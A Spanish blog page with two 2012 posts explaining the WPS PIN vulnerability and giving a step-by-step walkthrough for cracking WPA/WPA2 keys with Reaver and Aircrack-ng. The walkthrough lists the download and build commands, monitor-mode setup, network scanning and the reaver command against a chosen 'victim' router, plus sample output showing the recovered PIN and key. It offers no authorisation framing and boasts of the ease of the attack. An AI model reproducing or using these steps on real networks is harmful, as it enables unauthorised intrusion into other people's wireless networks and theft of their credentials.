Buscar este blog
Mostrando entradas con la etiqueta hack wpa2. Mostrar todas las entradas
Mostrando entradas con la etiqueta hack wpa2. Mostrar todas las entradas

sábado, 7 de enero de 2012

vulnerabilidad en el estándar WPS (Wi-Fi Protected Setup) hack wpa2




Como vimos en la anterior entrada se ha descubierto una vulnerabilidad en el estándar WPS (Wi-Fi Protected
Setup) que podría comprometer la robustez del PIN.

Wi-Fi Protected Setup, o WPS por sus siglas, es un estándar incluido
en muchos routers y dispositivos wifi que facilita a los usuarios la
creación de redes inalámbricas seguras. Dicho estándar dispone de
varios métodos para agregar dispositivos a una red:
* a través de un número PIN de 8 dígitos
* pulsando un botón de configuración (PBC o Push Button Configuration)
* mediante NFC (Near-Field Communication) acercando los dispositivos al
punto de acceso o router
* utilizando una llave USB que almacena los datos de la configuración

El estándar WPS lo implementan productos de fabricantes como Cisco,
Technicolor, TP-Link, ZyXEL, D-Link, Netgear, Linksys, y Buffalo, entre
otros muchos.

Vamos a ver un ejemplo practico:

Lo primero sera bajar el software

http://reaver-wps.googlecode.com/files/reaver-1.3.tar.gz

Una vez situados en la carpeta donde descargamos reaver lo descomprimiremos:

root@th2:/home/leviatan/Descargas# tar -xf reaver-1.3.tar.gz
root@th2:/home/leviatan/Descargas# cd reaver-1.3
root@th2:/home/leviatan/Descargas/reaver-1.3# cd src/
root@th2:/home/leviatan/Descargas/reaver-1.3/src# make
root@th2:/home/leviatan/Descargas/reaver-1.3/src# make install

con esto habremos compilado e instalado el software y sta listo para utilizar...

nos ayudaremos para monitorizar las redes y poner en modo monitor la targeta de red nuestra las herramientas de Aircrack-ng

root@th2:~# airmon-ng check kill (esto parara todos los procesos que estorban a aircrack)
root@th2:~# airmon-ng start wlan0 (ponemos la targeta en modo monitor)
obtendremos esta respuesta:

Interface Chipset Driver

wlan0 Intel 3945ABG iwl3945 - [phy0]
(monitor mode enabled on mon0)


root@th2:~# airodump-ng mon0 (monitoreamos la redes)

Seleccionaremos nuestra victima teniendo en cuenta que para que el ataque tenga exito el router tiene que tener la opcion WPS abilitada (la mayoria lo traen por defecto)

y ahora ejecutamos el comando

reaver -i mon0 -b 00:00:00:00:00:00 -vv (poniendo la mac de la victima claro)

y a esperar:

trying 00000000
attempt took 0.95 seconds
trying 00010009
attempt took 1.28 seconds
trying 00020008
attempt took 1.03 seconds
Key cracked in 483 seconds
[+] WPS PIN: '31681278'
[+] WPA PSK: 'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx'
[+] AP SSID: 'xx xxxxxxxa'

Reaver ha sido diseñado para ser un ataque sólido y práctico contra la WPS, y ha sido probado contra una amplia variedad de puntos de acceso y las distintas implementaciones de WPS. En promedio Reaver recuperará la clave WPA/WPA2 en texto plano del AP objetivo y su contraseña en un promedio de 4 a 10 horas, dependiendo del AP. En la práctica, por lo general, se llevará la mitad de este tiempo en encontrar el PIN WPS corregir y recuperar la contraseña.

leer mas
http://www.tacnetsol.com/products/
Publicado por en No hay comentarios:
Etiquetas: , ,

jueves, 5 de enero de 2012

HACKE-MATE WPA2



Investigadores de Tactical Network Solutions han desarrollado una
herramienta llamada Reaver que implementa un ataque sobre la
vulnerabilidad de WPS, siendo capaz de descubrir el PIN, y recuperar
la contraseña WPA/WPA2 en cuestión de horas. La herramienta Reaver
se ha liberado como un proyecto de código abierto en Google Code.


Como yo soy como San Pedro si no veo no creo,hicimos una prueva
REAVER se cargo una contraseña de 46 caracteres alfanumericos en 1:30h..sin handsacke,sin diccionario....y solo con un simple comando

La vulnerabilidad en WPS, descubierta por Stefan Viehbock, se debe
a un exceso de información en la respuesta EAP-NACK (Extensible
Authentication Protocol-Negative Acknowledgement) que el sistema envía
cuando la autenticación falla. Esto podría permitir a un atacante remoto
determinar si la primera mitad del PIN es correcta o no, disminuyendo
la robustez del mismo e incrementado las posibilidades de éxito de un
ataque por fuerza bruta.

Mediante esta vulnerabilidad, el problema de descubrir una clave de 8
dígitos se reduce a descubrir dos claves de 4 y 3 cifras (ya que la
octava es un dígito de control o "checksum"). Dicho de otra manera, el
número de intentos necesarios para descubrir el PIN se vería reducido de
10^8 (100.000.000) a 10^4 + 10^3 (11.000).

Además muchos routers wifi no implementan ninguna política de bloqueo
de los intentos de autenticación y, sin embargo, sí disponen de WPS
habilitado de forma predeterminada, reduciendo de esta manera el tiempo
necesario para lograr que un ataque de este tipo tenga éxito.
Publicado por en No hay comentarios:
Etiquetas: ,
Suscribirse a: Entradas (Atom)